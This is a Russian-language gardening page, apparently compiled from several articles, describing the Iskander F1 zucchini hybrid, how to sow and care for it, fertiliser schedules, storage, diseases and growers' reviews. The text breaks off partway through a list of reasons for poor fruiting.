23 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как сажать кабачок искандер

Описание и главные характеристики кабачка Искандер с фото и отзывами

Гибриды кабачков всегда востребованы у дачников за счёт своих усиленных селекцией качеств. Об одном из самых распространенных сортов читайте в нашей статье.

Описание и характеристики сорта Искандер F1

В последние годы всё большую популярность завоёвывает голландский гибрид Искандер F1. Отличная урожайность, неприхотливость и раннеспелость ставит его в ряды лидеров среди кабачков.

Регион выращивания

Результат современной селекции расширяет географию посадок кабачков. Искандер прекрасно будет себя чувствовать и в Центральной части России, и в Дальневосточном регионе, не испугается короткого сибирского лета и порадует своими плодами Урал и Поволжье. Изначально был включен в Госреестр селекционных достижений России по Нижневолжскому региону для открытых грунтов.

Внешний вид

Растение компактное, мощное и кустистое. Зелёные листья с выраженной пятнистостью крупные, средней рассечённости.

Плоды Искандера F1 нежно-зелёные в мелкую светлую крапинку. Они небольшие, булавовидной формы, сужаются у плодоножки. Товарная масса колеблется в пределах 500-700 г, в длину кабачок редко достигает больше 20 см. Тонкая кожура с еле заметным восковым налётом легко удаляется ножом.

Урожайность и область применения плодов

Искандер F1 славится своей высокой продуктивностью: максимальные сборы достигают 916 ц/га или до 17 кг с одного куста.

Урожайность сорта выше стандарта кабачка Грибовские 37 почти в 2 раза!

Раннеспелость сорта позволяет собирать отличные урожаи уже через 40-50 дней после посадки. Теплицы и укрытые грядки позволят овощам созреть ещё быстрее. Окончание плодоношения приходит только с первыми заморозками. Благодаря великолепной урожайности и неприхотливости, кабачок рекомендован к промышленному выращиванию.

Непревзойденные вкусовые качества Искандера сохраняются на протяжение всего сезона. Мякоть кремово-белая, плотная и нежная. Сорт используется в столовых целях, не теряет своих свойств при заморозке и консервации.

Видео-обзор сорта кабачков Искандер смотрите в следующем видео:

Устойчивость к заболеваниям и вредителям

Сорт отличается хорошей устойчивостью к распространенным заболеваниям кабачков. Для сохранения сопротивляемости болезням лучше всего подходит профилактика: соблюдение севооборота, поддержание оптимального уровня влажности, регулярные прополка и рыхление. Недопустимы повторные посадки и высадка в грунт после или рядом с представителями тыквенных.

Посадка и выращивание кабачка Искандер F1

Существует два основных способа посадки кабачков:

  • рассадный;
  • высадка семян в грунт.

Рассмотрим каждый из них подробнее.

Рассадный способ

Рассадный способ более трудоёмкий и дорогой, но первый урожай порадует на 2-3 недели раньше. Посев на рассаду начинается примерно за месяц до активных работ на огороде.

Подготовка семян

Подготовка семян для рассады проводится в следующем порядке:

  • замачивание в стимулирующем рост растворе до 24 часов;
  • хранение семян в мокрой ткани 24-48 часов при температуре 22-24 градуса.

В гибридных сортах самостоятельный сбор семян невозможен. Качественный материал для посева лучше покупать у проверенных поставщиков.

Посев семян на рассаду

Для активного роста растений желательно использовать удобренный грунт. В качестве добавок подойдут торф, навоз, перегной.

Можно самостоятельно приготовить питательную среду для рассады. Для этого понадобятся:

  • опилки 1 часть;
  • торф 5 частей;
  • перегной 5 частей;
  • 0,5 стакана золы и 5 г селитры аммиачной на 10 л смеси.

Сажать семена лучше всего в формочки из торфа, потому что молодые кабачки не любят пересадку. Либо при высадке в открытый грунт переносить растения вместе с землёй, чтобы не травмировать корни.

Ёмкости для посадки заполняют подготовленным грунтом и поливают, семена закладывают на глубину 3-4 см.

Уход за рассадой

К уходу за рассадой относятся полив, подкормка и соблюдение благоприятного температурного режима. До появления ростков идеальной температурой будет 18-25 градусов, после 17-20 градусов днём и 13-15 ночью. Полив рассады проводится исключительно тёплой водой раз в 5-7 дней.

За время роста растения можно провести 2 подкормки – через неделю после всходов, затем ещё через такой же промежуток времени. В первый раз готовят раствор из расчёта 0,5 ч.л. мочевины на литр воды с расходом 0,5 стакана на растение. Второй раз – 1 ч.л. нитрофоски на литр, расход – 200-250 мл на росток.

Пересадка рассады в грунт происходит после окончания заморозков, когда у растения уже выросли 2-3 настоящих листочка.

Высадка семян в грунт

Подготовленные семена высаживаются и сразу в грунт, но строго в хорошо прогретый – температура на глубине 5-6 см не ниже 8-10 градусов. Всхожесть во многом будет зависеть от места и качества почвы.

Выбор места

Главный фактор при выборе места посадки – качество земли. Идеальным вариантом будет легкая почва с нейтральной кислотностью на солнечной стороне. Грунтовые воды не должны быть слишком близкими, а почва нуждается в хорошем прогреве на всем периоде роста растения.

Идеально, если посев будет проходить после картошки, лука, паслёновых или бобовых.

Подготовка почвы

Кабачки, как и любые овощи, любят плодородную землю, поэтому подкормка крайне важна для высокого урожая. Но перед её проведением важно учесть тип почвы. Например, кислый грунт следует подвергнуть ощелачиванию, а для нейтрального достаточно удобрений.

Для максимального эффекта ощелачивание проводится осенью.

Варианты подкормки почвы в таблице:

Тип почвы
Вид удобрения на 1 кв. м
Песчаная Торф или дёрн 10 кг и 2 кг опилок или компоста, горсть золы
Глина/суглинок По 2-3 кг торфа или дёрна и компоста или опилок, горсть золы
Торфяная 10 кг дёрна или компоста, горсть золы, 15-20 г сульфата калия и суперфосфата

Схема посадки

Для обеспечения полноценного питания растений рекомендуется соблюдать схему посадки 150-200×60-70 см.

Под рассаду готовятся лунки 15-20 см глубиной и около 30 см шириной, семена сажают на глубину 4-6 см. Их обильно поливают и вносят смесь гуминового удобрения и азофоски.

Рассада пересаживается в открытый грунт в вечернее время или в пасмурную погоду.

Особенности ухода за кабачком Искандер F1

Искандер F1 весьма неприхотливый сорт, но должные уход и забота позволят получить максимальный урожай превосходного качества.

Полив

Кабачок неплохо переносит засушливую погоду, но для полноценного роста и развития требуется полив около 20 л на куст. Особенно важен он в начале вегетационного периода, когда растение только набирает силу.

Для проведения поливов необходимо следить за подсыханием почвы, в среднем 1-2 раз в неделю будет достаточно. Его производят тёплой водой непосредственно на грунт под корень, чтобы избежать гнили на листьях и завязи.

Подкормка

Регулярное внесение удобрений увеличивает урожай на 40-50 %. Оптимальным считается 3 подкармливания за сезон:

  • при наличии 3-4 настоящих листков;
  • в начале появления завязи:
  • во время плодоношения.

Первое внесение добавок проводится следующей смесью: по 20 г аммиачной и калийной селитры, 40 г суперфосфата из расчёта на ведро воды. Неплохим вариантом будет внесение раствора куриного помёта (1 к 20) или коровяка (1 к 10) в объеме 2 л на растение.

Во вторую и третью подкормку питательный состав готовится из 50 г суперфосфата и 50 г калийной селитры на ведро воды.

Кабачок не любит хлорсодержащие удобрения.

Опрыскивание

Опрыскивания кабачка преследует 2 цели:

  • повышение устойчивости к вредителям и болезням;
  • привлечение насекомых для лучшей опыляемости.

Для повышения иммунитета растения для опрыскивания могут использоваться народные средства: настои луковой и чесночной шелухи, табачный настой или раствор золы и мыла.

Для привлечения опылителей применяют подслащенный раствор: 5 г борной кислоты растворяют в ведре воды, добавляют сахар. Такой вариант актуален для тепличных кабачков.

Рыхление, прополка и мульчирование

Рыхление почвы увеличит её пропускную способность для влаги, воздуха и тепла. Но потребуется особая аккуратность из-за близко расположенных к поверхности корней кабачка. Мульчирование торфом и перегноем упростит эту задачу.

Прополка проводится по мере роста сорняков. Особо тщательно следить за ними нужно в период активного роста растения. После крупные листья кабачка начнут забивать рост других растений, и грядка будет оставаться практически чистой.

Сбор и хранение урожая

Раннеспелость Искандера дарит возможность сбора первых овощей уже через 40-45 дней после всходов. Снимают кабачки с куста в сухую погоду 2-3 раза в неделю. Необычная особенность сорта заключается в том, что чем выше сборы, тем больше новой завязи.

Хорошо вызревшие овощи способны храниться в подвале до 6 месяцев при температуре до +10 градусов. Зрелость легко проверить: кожура становится тверже и не поддаётся царапинам, а звук при постукивании — глухой.

Вкусовые качества Искандера F1 сохраняются при консервации и заморозке.

Вредители и заболевания

Кабачок может пострадать от болезней или вредителей. Основные признаки поражения и методы борьбы приведены в таблице:

Заболевание/вредитель Признаки поражения Лечение
Антракноз Разрастающиеся светлые пятна на листьях, листва буреет и засыхает. Удаление заболевших частей, опрыскивание бордосской жидкостью.
Мучнистая роса Мучнистый белый налёт с тенденцией к увеличению площади поражения. Обработка настоем коровяка или сена.
Серая гниль Растущие участки гниения на завязях и цветах. Замена почвы, фосфорные удобрения, удаление пораженных участков, разумный севооборот.
Пероноспороз Светлые пятна на листьях, приводящие к бурению и засыханию. Удаление заболевших частей, опрыскивание бордосской жидкостью.
Паутинный клещ Многочисленные светлые точки-пятна, лист желтеет и гибнет. Удаление больных листьев, опрыскивание настойкой горького перца.
Бахчевая тля Пораженные цветы, завязь и листья засыхают и гибнут. Удаление и сжигание больных частей куста, обработка карбофосом.
Белокрылка Заражение сажистыми грибами, листья погибают. Обработка препаратами «Конфидор» или «Фосбецид».

Достоинства и недостатки сорта

К несомненным достоинствам Искандера F1 относятся:

Кабачок Искандер F1

Кабачок Искандер F1 – гибрид голландской селекции. Отличается очень ранним сроком созревания, приятным нежным вкусом плодов, выносливостью. Выращивается в странах с различными климатическими условиями, так как пригоден для возделывания в открытом грунте и теплицах. В уходе не требователен, а урожайность имеет очень высокую.

Описание и характеристики сорта Искандер F1

Кабачок Искандер F1 относится к раннеспелым гибридам кустового типа. От появления первых всходов и до сбора урожая проходит в среднем 40 суток. При этом срок плодоношения у него весьма долгий – до первых заморозков. Урожайность высокая – 17 кг/куста. Имеется устойчивость к некоторым заболеваниям, засухе, небольшим заморозкам. Рекомендуется для выращивания в теплицах, пленочных туннелях и на отрытом грунте.

Плоды цилиндрической формы, узкие, длиной 15-20 см

Растение мощное, но довольно компактное, прямостоящее. Плоды цилиндрической формы, узкие, длиной 15-20 см. Поверхность гладенькая, ребристость развита слабо. У плодоножки кабачок немного сужается. Основная часть кожуры зеленоватая с обилием прожилок и крапинок. Масса одного овоща 480-640 грамм. Мякоть всегда плотная, кремово-белая. Вкусовые качества отличные.

Как сажать кабачок Искандер F1?

Лучше всего кабачок Искандер F1 растет на легкой плодородной почве с низкой или умеренной кислотностью. Грунтовые воды должны располагаться как можно ниже, так как обилие влаги приведет к загниванию корневой системы. Высаживается после лука, томата, картофеля, моркови и свеклы.

Лучше всего кабачок Искандер F1 растет на легкой плодородной почве с низкой или умеренной кислотностью

Посев семян в открытый грунт всегда приходится в конце мая или начале июня. В теплицы и пленочные туннели можно сажать культуру с начала апреля. Если задержать с посадкой, растение будет медленно развиваться и может дать мало урожая – завязи появляются при небольших температурах, в жару их можно не ожидать. Однако более ранняя посадка может привести к вымерзанию посевов при первых же запоздалых морозах, так как значительные понижения температур этот сорт кабачков не выдерживает.

Под высадку готовятся отдельные лунки на расстоянии в 60 см друг от друга в шахматном порядке. Если земля не удобрялась осенью или за 2 недели до посадки культуры, стоит в каждую ямку положить примерно жменю перегноя или компоста, хорошенько смешать с землей и полить прогретой на солнце водичкой.

В каждую лунку закладывают по 2-3 семени на глубину 4-5 см, чтобы всходы появились наверняка. Затем их присыпают землей примерно на 4 см. Заранее обрабатывать семена кабачка Искандер F1 не нужно, если фирма проверенная, а семена обработаны еще на фабрике по их производству (указывается на упаковке). В противном случае можно замочить их до посадки на 30 минут в растворе марганцовки или настое древесной золы.

Нужно ли делать рассаду?

При посадке в открытый грунт или теплицу семенами кабачки сорта Искандер F1 дают отменные всходы, созревают быстро, поэтому рассаду обычно не делают, если продукт выращивается для личного потребления. Если же овощ необходим для продажи, можно заготовить рассаду, только желательно в торфяных стаканчиках, так как пересадку молодые растения этого вида не любят.

Рассаду начинают делать с начала марта, чтобы уже через месяц пересадить ее в теплицу или парник. Если же культура возделывается прямо под открытым небом, заготовку стоит отложить на середину апреля. Выращивается она в течение 1 месяца, затем пересаживается в отдельные лунки. Если рассада слабая можно в каждую лунку сажать по 2 ростка, а не по одному, просто для подстраховки.

Как ухаживать за кабачком Искандер F1?

Пока семена не дали всходов уход за культурой минимальный. Ее можно разве что полить, если земля сильно пересохнет и удалить сорняки, чтобы они не забирали из земли питательные вещества.

Как только появились всходы кабачков сорта Искандер F1, за ними нужно начинать внимательно смотреть. Самые хилые и слабые стоит удалять – они не дадут большого урожая и только потянут полезные вещества из земли. Убирать плохие ростки нужно очень аккуратно, чтобы не повредить корешки «соседей».

Вначале можно разве что полить, если земля сильно пересохнет и удалить сорняки

Дальнейший уход сводится к регулярному поливу, рыхлению, окучиванию, уборке сорняков, внесении подкормок. Важно отметить, что обильный полив нужен только в период развития растения и появления завязей. В остальное время стоит его ограничивать. Поливают кустики только тогда, когда земля под ними начнет подсыхать.

Время от времени может потребоваться опрыскивание кабачка Искандер F1 от вредителей или болезней. Использовать рекомендуется народные средства на начальной стадии или же специализированные биологические и химические препараты в более запущенных случаях.

Сбор и хранение урожая

Сбор урожая проводят раз в две недели, а то и чаще, после того, как плоды достигнут технической спелости. Интересной особенностью сорта является то, что чем чаще собираются плоды, тем быстрее появляются новые завязи.

Сбор должен проводиться в сухую погоду, чтобы плоды не были мокрыми от дождя или росы

Передерживать кабачок Искандер F1 на кустах не рекомендуется. Сбор должен проводиться в сухую погоду, чтобы плоды не были мокрыми от дождя или росы.

После сбора их стоит спрятать в холодильник, использовать для приготовления блюд или перерабатывать для последующего хранения. Кабачки Искандер F1 имеют универсальное предназначение, их используют для приготовления различных блюд, консервирования, заморозки, иногда даже для сушки.

ВИДЕО — Выращивание кабачков Искандер гибрид F-1

Суперкабачок Искандер: особенности сорта и его выращивания

Искандер F1 — это как раз тот сорт кабачков, знакомство с которым может стать приятным сюрпризом в новом огородном сезоне. Он очень скороспел, урожаен, нетребователен в уходе, да и вкус у него просто отличный.

Описание сорта Искандер, его характеристики, регион выращивания

Кабачок сорта Искандер F1 — сравнительно недавно появившийся в России гибрид голландской селекции. Он включён в Госреестр селекционных достижений РФ в 2006-ом году как партенокарпический гибрид первого поколения. Допущен к выращиванию в Северо-Западном, Волго-Вятском, Нижневолжском, Уральском, Западно — Сибирском и Дальневосточном регионах. Искандер относится к раннеспелым сортам кабачков. Рекомендован не только для частного, но и промышленного производства, что связано с его нетребовательностью к уходу, переносимостью неблагоприятных погодных условий и высокой урожайностью. С одного гектара можно снять, по данным Госреестра, — 916 ц/га.

Искандер — один из лучших современных сортов кабачков

Внешний вид

Растение мощное, компактное, пряморослое. Листья средней рассечённости имеют темно-зелёную окраску с ярко выраженной пятнистостью. Плоды светло-зелёного цвета со светлыми крапинками и прожилками и белоснежной мякотью. Длина плодов в среднем составляет 18–20 см. Товарная масса — 500–650 граммов. С каждого куста на участке можно собрать до 15–17 кг зрелых плодов.

Куст компактный, пряморослый, мощный

Отличительные особенности сорта

Одной из отличительных особенностей сорта Искандер является его ранняя спелость — сформировавшиеся плоды уже можно снимать через 35–40 дней после высадки семян в почву. Сорт способен завязывать плоды даже при относительно низких температурах. Если выращивать кабачки под плёнкой — результат можно получить ещё раньше.

Кожица у кабачков сорта Искандер очень тонкая и нежная.

Ещё одно важное достоинство сорта Искандер — его высокая продуктивность. Именно поэтому сорт рекомендован для промышленного выращивания. По данным Госреестра, максимальная урожайность выше стандарта Грибовские 37 на 501 ц/га и составляет 916 ц/га, за первые два сбора — 139 ц/га.

Искандер способен давать по 15–17 кг плодов с одного куста

Плюсом сорта является и его устойчивость к заболеваниям мучнистой росой и антракнозом.

Особенности посадки и выращивания

Лучшие предшественники для кабачков:

  • картофель;
  • лук;
  • ранняя кочанная и цветная капуста;
  • бобовые;
  • корнеплоды.

Выращивать кабачки сорта Искандер можно как безрассадным способом, так и с помощью рассады.

Рассадный способ выращивания

Высевать семена нужно за месяц до высадки рассады в открытый грунт, т.е. в последней декаде апреля. Если же рассаду планируется высаживать под плёнку, начинать готовить её можно уже в середине апреля.

Подготовка семян

Чтобы семена проросли быстрее, а всходы были крепкими и дружными, нужно провести их подготовку. Способов существует несколько, но чаще всего семена замачивают в тёплой воде в течение суток, а затем держат их во влажной ткани несколько суток при температуре около 25 о С, не допуская высыхания ткани.

Предварительно полезно провести закаливание семян, положив их на 2–3 суток в нижнее отделение холодильника.

Перед посевом семена следует правильно подготовить

Посев семян на рассаду

Выращивать рассаду можно на солнечном подоконнике в квартире или в теплице.

Питательная смесь для рассады кабачков может иметь следующий состав:

  • 5 частей торфа,
  • 4 части перегноя,
  • 1 часть опилок,
  • полстакана древесной золы и 6–5 г аммиачной селитры на ведро смеси.

Смесью заполняют стаканчики без дна (10×10см), поливают тёплой водой и заделывают в них семена на глубину 3–4 см.

Уход за рассадой

Для правильного роста и развития растений важен температурный режим. Оптимальные температурные условия таковы:

  • до появления всходов — 18–25°С;
  • после появления всходов в течение 4–5 дней ночью 12–15°С, днем 15–20°С;
  • далее до высадки в грунт надо поддерживать ночью 13–17°С, а днем 17–22°С.

Полив

Полив осуществляется только тёплой водой (+25°С) – 1л/8 растений через 5 дней.

Подкормки

1-ая подкормка проводится через неделю после появления всходов: 0,5 ч.л. мочевины/1л воды, расход — полстакана/растение.

2-ая подкормка — ещё через неделю: 1 ч.л.нитрофоски/1л воды, расход — стакан /растение.

Чтобы рассада выросла крепкой, необходимо соблюдение теплового режима, проведение подкормок и поливов

Высадка рассады в грунт

В грунт рассаду высаживают, когда минует угроза заморозков. Лучше, если это будет подготовленная паровая грядка или паровая куча.

Паровые гряды устраиваются по типу углубленных, утепленных гряд, с более глубоким котлованом, в котором, ежегодно меняя биотопливо, выращивают в продолжение нескольких лет ранние овощи.
Когда размер площади под паровые гряды незначителен, все работы по подготовке и их устройству производятся вручную. Для устройства паровых гряд на больших площадях часто пользуются плугом. Гряды делают длиной в 20 м и не более 30 м. Ширина котлована 1—1,1 м, ширина окончательно подготовленной грядки 1,2 м, ширина между грядами 50—60 см. Ряды располагаются с севера на юг.
Паровые и навозные гряды целесообразно делать шириной только в 1,20 м, так как при такой ширине лучше используется биотопливо, во-вторых, облегчается уход за растениями и в случае похолодания для защиты растений можно использовать свободные парниковые рамы, расставляя их на горбыли, жерди и другие подставки вдоль гряды.

И.П.Попов

«Выращивание ранних овощей» Горьковское изд-во, 1953 г.

У рассады к этому моменту должны быть хорошо развиты 2–3 настоящих листа. Перед высадкой следует хорошо полить рассаду и лунки тёплой водой. Растение с комом земли опускают в лунку ниже уровня земли на 2–3 см и плотно обжимают землей до семядольных листочков.

Поверхность грядки лучше укрыть темной плёнкой для сохранения тепла, а над грядкой поставить проволочные дуги с натянутой на них плёнкой, что даст возможность высадить рассаду на 2–3 недели раньше.

Высаживать рассаду кабачков лучше на паровую грядку или в паровую кучу

Видео: полезные хитрости при выращивании кабачка Искандер F1

Высадка семян непосредственно в грунт

После проведённой (см. выше) предварительной подготовки семян их высаживают в подготовленную почву. Но можно высаживать и сухие семена. Глубина посадки зависит от качества почвы: при лёгких почвах это может быть 6–7 см, при тяжелых — 3–4 см. Расстояние между отдельными растениями должно составлять 1 м, между рядами — 1,5 м. В одну лунку высаживают по 2 семечка, чтобы в будущем оставить одно более сильное растение.

Кабачки любят плодородные почвы, поэтому требуется также провести её предварительную подготовку:

  • Если почва супесчаная, то следует добавить по ведру торфа, перегноя, опилок и дерновой земли / м 2 ;
  • Такой же состав требуется и для улучшения суглинка — по 2–3 кг/ м 2 .

Лучше, если почва будет подготовлена заблаговременно, чтобы земля хотя бы в течение недели улежалась. Место для кабачков должно быть солнечным и теплым.

Сроки посадки могут варьироваться от начала мая до начала июня. Главное условие — хорошо прогревшаяся почва. В противном случае семена могут не взойти или растения будут долго болеть.

Всходят семена Искандера достаточно быстро. При температуре 15–16 о С всходы появятся уже на пятый день.

Семена нужно сажать в хорошо прогревшуюся землю

Видео: высадка кабачков семенами на крапиву

Уход за кабачками

Уход за кабачками включает в себя своевременный полив, подкормки, рыхление и мульчирование почвы с удалением сорняков.

Полив

Поливать кабачки до цветения достаточно раз в неделю, а с момента появления завязей его следует удвоить: 5–10л воды/растение. Полив производится прогретой отстоявшейся водой непосредственно под корень, чтобы не вызвать загнивания завязей и листьев.

Поливать кабачки следует непосредственно под корень

Подкормки

Рекомендуется провести за весь сезон 3 подкормки:

  • в фазе 3–4 настоящих листьев провести подкормку следующим составом: 20 г аммиачной селитры, 20 г калийной селитры, 40 г суперфосфата / ведро воды; хорошо подкормить растения настоем куриного полёта (в соотношении 1:20) или коровяка (1:10) – 2л на одно растение;
  • в момент появления завязей: по 50 г суперфосфата и калийной селитры/10 л воды;
  • повторение предыдущей подкормки в период плодоношения.

Кабачки хорошо отзываются на подкормки органикой

Рыхление и мульчирование

Сложность этой операции заключается в том, что у кабачков корни расположены очень близко к поверхности почвы. Поэтому рыхление проводится с осторожностью, неглубоко. Если провести мульчирование почвы смесью торфа и перегноя, то рыхление будет проводиться проще.

Со временем для улучшения светового режима требуется проводить периодическое удаление нижних листьев.

Видео: как получить много кабачков с одного куста

В прошлом году моё внимание тоже привлек этот сорт, в первую очередь своим необычным названием (потому что сын у нас— ракетчик, который служит в части, где на вооружении стоят ракетные установки с таким же названием). И я высадила в середине мая несколько Искандеров через рассаду, которая прекрасно перенесла пересадку. В начале июня началось затяжное похолодание, но Искандер его выдержал стойко, даже листья не пожелтели. Первые плоды мы смогли снять уже в начале июля. Сорт Искандер радовал нас достаточно обильным плодоношением в течение всего сезона, хотя всё лето погода оставалась дождливой и холодной. Теперь этот гибрид останется моим любимцем и впредь.

Хранение

Хранятся кабачки сорта Искандер до полугода при условии, что для этой цели плоды срывались уже после затвердения кожицы. В противном случае плод начнет портиться гораздо раньше.

Оптимальная температура хранения — не выше +10 о С. Помещение должно быть сухим и тёмным.

Плоды можно хранить в измельченном замороженном виде.

Удобно хранить кабачки в измельченном замороженном виде

Отзывы

В 2015 году я посадил грядку кабачков, голандскими семенами сорта Искандер! Это ультраранний гибрит кабачка, предназначенного для получения массового производства в открытых грунтах. Плодоношение данного сорта длится более двух месяцев! Плоды кабачков цилиндрической формы и длиной 18–20 сантиметров, светло-зеленого цвета, а мякоть просто белоснежная! Данный сорт отлично подходит для употребления в пищу (в жаренном виде очень вкусные), а также можно делать закрутки, лично я мариновал, получилось просто супер! Хороший сорт, в этом году обязательно посажу ещё немного), чего и Вам советую, не пожалеете!

Matadork1 Украина, Сарата

http://otzovik.com/review_4419671.html

Пока не нашла хорошего сорта кабачка, сею этот гибрид. Хоть и дорогие семена, но зато гарантированный, насколько возможно, урожай. Вкусные, урожайные, долго не отходят. Сеяла в 3 ряда через 70 см друг от друга, но не мешало бы расстояние дать побольше. Из ухода — только замульчировала сеном и часто поливала. В прошлом году из 15 семян было 13 кустов кабачков. Высадила в начале мая, через месяц цвели и завязывались, а 20 июня собрала первые 9 кг плодов, и плодоношение продолжалось до 20 сентября (дальше ночи стали слишком холодными). За весь период собрала 60 кг, но это не предел: в конце плодоношения я оставляла на кустах большие экземпляры, что мешало развиваться новым завязям. Молодые мне уже были не нужны, хотелось заготовить на зиму и проверить, будут ли лежать старые кабачки зимой в доме, как тыквы, поэтому последние плоды держала на кустах, пока хвостики не пересохли. Оказывается, да! Последний долежал до 1 марта, как и последняя тыква. Старые плоды очень вкусны в овощном рагу.

Наталия, Киев.

Источник: http://sortoved.ru/blog-post/sort-kabachka-iskander-f1

Кабачок Искандер может стать приятной находкой в новом сезоне

Если вы решили познакомиться с кабачком Искандер ближе, пора запасаться семенами. Он обязательно порадует достойным урожаем, если будут соблюдены те условия, которые описаны в статье.

Кабачок Искандер: описание сорта и 9 особенностей ухода

Выращивание гибридов сопровождается отсутствием собственных семян, что не очень удобно. А тут решила попробовать кабачок сорта Искандер F1. Отзывы о нем были уж очень хорошие. В пакетике было всего 5 семян – для пробы самое то, но, вообще, мало.

Высадила их вместе с другими семенами сразу на грядку. Взошли все! Быстро сформировались аккуратные кусты и завязались плоды. Сорт поразил меня своим урожаем.

Сажать рассадой или семенами в открытый грунт

Кабачок Искандер

Общая
характеристика
Раннеспелый
Лежкость
(сохранность на хранении)
Высокая
Назначение Подходит для употребления в свежем и переработанном виде
Масса плода до 500г
Устойчивость
к заболеваниям
Высокая

Кабачок Искандер — фото и описание сорта:

  1. Искандер— гибрид голландской селекции (лат. Cucurbita pepo L.). Куст компактный, диаметром 1,2 м, без плетей, занимает немного места. Листья зеленые крупные, жесткие, рассеченные с ярко выраженной пятнистостью. Цветы желто-оранжевого цвета, женского и мужского типа, нуждаются в опылении насекомыми. Сорт раннеспелый, через 30-45 дней после посадки дает первый урожай.
  2. Плоды цилиндрические, светлые, с глянцевой поверхностью. Кожица тонкая, гладкая, с ярко выраженными крапинами темного цвета. Отличительной особенностью гибридного кабачка является то, что он не перерастает, сохраняя нежность мякоти. Мякоть плотная, белая, сочная. Вкусовые качества великолепные. Средний вес кабачка 500-600 г, длина достигает 18-25 см. Урожайность с одного куста — 15-17 кг. Плодоношение продолжительное. Подходит для употребления в свежем и переработанном виде.
  3. Гибрид Искандер отличается стойкостью к антракнозу и мучнистой росе. Можно выращивать в теплицах, пленочных укрытиях и открытом грунте. Семена в мякоти не образуются, сохраняя ее нежность. Показывает хорошую завязываемость плодов в условиях низких температур.

Автор отмечает скороспелость и отличные вкусовые качества Искандера. При этом отмечая его высокую урожайность даже в условиях холодного и дождливого лета:

Сажать на прогреваемые места защищенные от ветра

Кабачки Искандер F1 — посадка, уход и правила выращивания:

Выбор посадочного места

Этапы:

  • земля для посадки культуры должна быть рыхлой с нейтральной кислотностью;
  • раскислить почву можно внесением доломитовой муки или древесной золы;
  • необходимо хорошее прогревание грунта в процессе всего вегетативного периода;
  • хорошими предшественниками для посадки являются пасленовые, бобовые и крестоцветные культуры
Подготовка семян

Этапы:

  • кабачки можно выращивать рассадным и безрассадным способом;
  • перебрать семена перед посадкой, выбрав плотные, без повреждений;
  • замочить отобранный материал на 24 часа в стимуляторе роста;
  • завернуть подготовленные семечки во влажную салфетку, положить на 2 дня в теплое место;
  • после, семена готовы к посадке
Выращивание рассады

Этапы:

  • для посадки следует подготовить отдельные торфяные стаканчики или посадочные кассеты;
  • грунт лучше брать из специализированных магазинов, но можно приготовить самостоятельно из торфа, навоза, песка и садовой земли взятых в равных пропорциях;
  • хорошо увлажнить подготовленную землю и в каждый стаканчик посадить по 1 семечки;
  • раз в 7-10 дней увлажнять почву;
  • высаживать рассаду следует аккуратно вместе с земляным комом
Подготовка грядки

Этапы:

  • кабачки относятся к тыквенной культуре и нуждаются в достаточно плодородной почве;
  • лучше всего растут на теплых грядках, которые и обеспечивают прогревание грунта весь период роста растений;
  • можно использовать для устройства гряды небольшой короб наполненный соломой, скошенной травой, листьями, навозом, огородным мусором;
  • сверху на подготовленную грядку насыпается плодородная земля перемешанная с песком и торфом, слоем 10-15 см;
  • для ранней высадки можно предусмотреть пленочное укрытие
Посадка

Этапы:

  • высаживать семена можно сразу в открытый грунт;
  • сделать в земле лунки;
  • полить их теплой водой;
  • в каждую лунку положить по 2 семечка;
  • присыпать землей;
  • расстояние между лунками должно составлять 80 см;
  • накрыть грядку пленкой или спанбондом;
  • при дефиците органики, можно сделать лунки в земле и в каждую внести мочевину — 50 г на 1 кв.м и древесную золу — 0,5 л на лунку;
  • хорошо полить лунки и замульчировать почву
Полив

Этапы:

  • кабачки очень влаголюбивая культура;
  • для сохранения влаги в земле использовать мульчу;
  • как только под мульчей почва подсыхает обильно поливают растения;
  • на один куст требуется 10 л воды; воду следует лить под корень;
  • в период длительной жары, можно устраивать дождевание;
  • для привлечения насекомых проводить опрыскивание подслащенной водой;
  • для предотвращения загнивания листьев и плодов использовать теплую воду +20 град;
  • после каждого полива следует рыхлить землю и обновлять мульчу
Прореживание

Этапы:

  • для предотвращения загнивания и развития болезней необходимо удалять все листья, которые ложатся на землю;
  • такую процедуру необходимо проводить 1 раз в неделю, удаляя по 2-3 листа за один раз;
  • также обрезке подлежат листья расположенные в центре розетки, чтобы открыть доступ насекомым к цветам
Подкормка

Этапы:

  • растение нуждается в большом количестве азота, если оно растет на компостной (теплой) грядке, то подкормки будут излишние, а в земле необходимо куст подкормить;
  • для подкормки можно использовать настой из сорной травы: наполнить емкость зеленой массой и залить водой. Настаивать в течение 14 дней, помешивая. Когда жижа приобретет бурый цвет, то настойка готова. Норма расхода 2 л на ведро воды;
  • настой птичьего помета или коровяка готовится аналогичным образом. Норма расхода помета — 0,5 л на ведро воды, а коровяка — 1 л;
  • подкормка вносится под корень после полива;
  • кормить кабачки следует в период образования 3-4 листов, в период цветения и образования плодов, каждые 2 недели;
  • золу вносят через 10-14 дней после азотного удобрения
Сбор на хранение

Этапы:

  • для длительного хранения следует дождаться пока плоды созреют и покроются твердой корочкой;
  • если при постукивании плод издает звонкий стук, то он созрел;
  • зрелый кабачок можно сохранить до 5 месяцев в сухом и прохладном помещении;
  • собирать вызревшие плоды необходимо в сухую погоду;
  • срезать вместе с плодоножкой;
  • грязь аккуратно обтереть тряпкой;
  • сложить урожай в коробки и убрать в подвал

При выращивании гибридных сортов собрать семена на посадку не получится, их придется приобретать ежегодно в специализированных магазинах.

Болезни и вредители

Аскохитоз

Поражает все части кабачков.

Способы борьбы:

  1. убирать участок от растительных остатков осенью;
  2. проводить умеренный полив, особенно следить за влажностью в период затяжных холодных дождей;
  3. прореживать загущенную крону растений;
  4. пораженные места можно присыпать толченым углем или мелом;
  5. обработать кусты Триходермином
Бактериоз

Портятся плоды и снижается урожайность.

Способы борьбы:

  1. проводить дезинфекцию семян;
  2. убирать остатки растений с огорода;
  3. соблюдать севооборот;
  4. обрабатывать 1% раствором бордоской жидкости или 0,4 % хлорокисью меди;
  5. за 15-20 дней до сбора урожая обработку любыми средствами прекратить
Фузариозное увядание

Поражаются все части растения, первым делом страдает корень.

Способы борьбы:

  1. обезопасить здоровые кабачки от заражения можно обработкой их зольно-серной смесью;
  2. проводить внекорневые подкормки и частое рыхление почвы;
  3. опудрить нижнюю часть растения и корень древесной золой смешанной с Триходермином;
  4. для оздоровления земли после грибковых поражений использовать осенний посев сидератов

Почему не плодоносят

  1. Семена собраны самостоятельно с гибридных сортов. Семена от гибридных растений не наследуют генетические признаки родителя, поэтому могут быть пустоцветами
